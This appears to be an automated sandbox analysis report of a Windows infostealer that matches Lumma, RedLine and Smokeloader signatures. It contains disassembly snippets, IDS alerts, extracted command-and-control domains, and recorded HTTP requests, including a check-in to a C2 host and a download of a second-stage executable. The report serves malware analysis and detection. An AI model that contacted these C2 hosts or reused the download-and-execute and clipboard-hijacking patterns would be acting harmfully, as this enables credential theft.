Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h] | 3_2_00AF6544
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00B0C6C3
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_00B0A637
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov edx, eax | 3_2_00B07797
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp ecx | 3_2_00B1C79B
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh] | 3_2_00AF77E9
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, dword ptr [esi+64h] | 3_2_00AF87DF
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then jmp eax | 3_2_00B06739
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_00B0B763
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00B0B763
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_00B0C8B1
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_00B13897
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then cmp word ptr [ebx+ecx], 0000h | 3_2_00B00817
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00AF4806
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h] | 3_2_00B0B75E
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_00B0B75E
Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_00B0C99C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00B0C98D
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_00B1A9DE
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00B089C0
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00AF99D7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov eax, edx3_2_00AFC921
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00AF6907
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00AE9967
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00AE9967
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00AE9967
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_00B0C94B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_00AEEAA2
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_00AEDA09
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_00AEDA09
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00AEABA7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00AEABA7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00B05BF7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00B05BF7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_00AECB7E
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov esi, eax3_2_00B03C9B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_00B16C3B
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00B09C17
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_00AFEC17
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_00B1BC08
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_00B1CD87
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B1AD19
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00B16E67
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_00AEDF8C
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_00B1CFC7
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx3_2_00AF8F35
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_00AF8F35
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00B01F77
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00AF5F79

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.11:60070 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.11:50695 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.11:62987 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.11:65123 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.11:50751 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.11:55952 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.11:62009 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.11:49991 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.11:53761 -> 1.1.1.1:53
                  Source: Network trafficSuricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.11:49754 -> 104.102.49.254:443
                  Source: Malware configuration extractorURLs: diffuculttan.xyz
                  Source: Malware configuration extractorURLs: awake-weaves.cyou
                  Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                  Source: Malware configuration extractorURLs: deafeninggeh.biz
                  Source: Malware configuration extractorURLs: debonairnukk.xyz
                  Source: Malware configuration extractorURLs: sordid-snaked.cyou
                  Source: Malware configuration extractorURLs: immureprech.biz
                  Source: Malware configuration extractorURLs: effecterectz.xyz
                  Source: DNS query: effecterectz.xyz
                  Source: DNS query: diffuculttan.xyz
                  Source: DNS query: debonairnukk.xyz
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 13:08:21 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 14 Dec 2024 13:00:02 GMTETag: "58600-6293a86885370"Accept-Ranges: bytesContent-Length: 361984Content-Type: application/x-msdos-program
                  Source: Joe Sandbox ViewIP Address: 104.21.22.222 104.21.22.222
                  Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                  Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49711 -> 176.113.115.19:80
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49727 -> 104.21.22.222:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49754 -> 104.102.49.254:443
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49739 -> 104.21.96.1:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:49710 -> 104.21.56.70:443
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: deafeninggeh.biz
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=823712327b42f853acafd544; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35131Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 14 Dec 2024 13:08:38 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                  Source: global trafficDNS traffic detected: DNS query: sordid-snaked.cyou
                  Source: global trafficDNS traffic detected: DNS query: immureprech.biz
                  Source: global trafficDNS traffic detected: DNS query: deafeninggeh.biz
                  Source: global trafficDNS traffic detected: DNS query: effecterectz.xyz
                  Source: global trafficDNS traffic detected: DNS query: diffuculttan.xyz
                  Source: global trafficDNS traffic detected: DNS query: debonairnukk.xyz
                  Source: global trafficDNS traffic detected: DNS query: wrathful-jammy.cyou
                  Source: global trafficDNS traffic detected: DNS query: awake-weaves.cyou
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz
                  Source: 3247.tmp.exe, 00000003.00000003.1550738493.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                  Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknown | HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.11:49710 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.22.222:443 -> 192.168.2.11:49727 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.11:49739 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:49754 version: TLS 1.2
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep | 0_2_004016DF
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_02491942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep | 0_2_02491942
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: 3_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt | 3_2_00431839

                  System Summary

                  Source: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_02492361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC | 0_2_02492361
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: 0_2_02492605 NtdllDefWindowProc_W,PostQuitMessage | 0_2_02492605
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\3247.tmp.exe 4D37939B6C9B1E9DEB33FE59B95EFAC6D3B454ADF56E9EE88136A543692EA928
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: String function: 00410720 appears 52 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: String function: 0040F903 appears 36 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: String function: 024A0987 appears 52 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: String function: 0040FDB2 appears 125 times
                  Source: C:\Users\user\Desktop\XIaCqh1vRm.exe | Code function: String function: 024A0019 appears 121 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: String function: 00AF42C7 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: String function: 00414060 appears 74 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: String function: 00407F70 appears 46 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Code function: String function: 00AE81D7 appears 78 times
                  Source: C:\Users\user\AppData\Local\Temp\3247.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 1724
                  Source: XIaCqh1vRm.exe | Binary or memory string: OriginalFileName vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exe, 00000000.00000003.1318381994.0000000002500000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exe, 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs XIaCqh1vRm.exe
                  Source: XIaCqh1vRm.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.3744559508.0000000000A09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: XIaCqh1vRm.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 3247.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
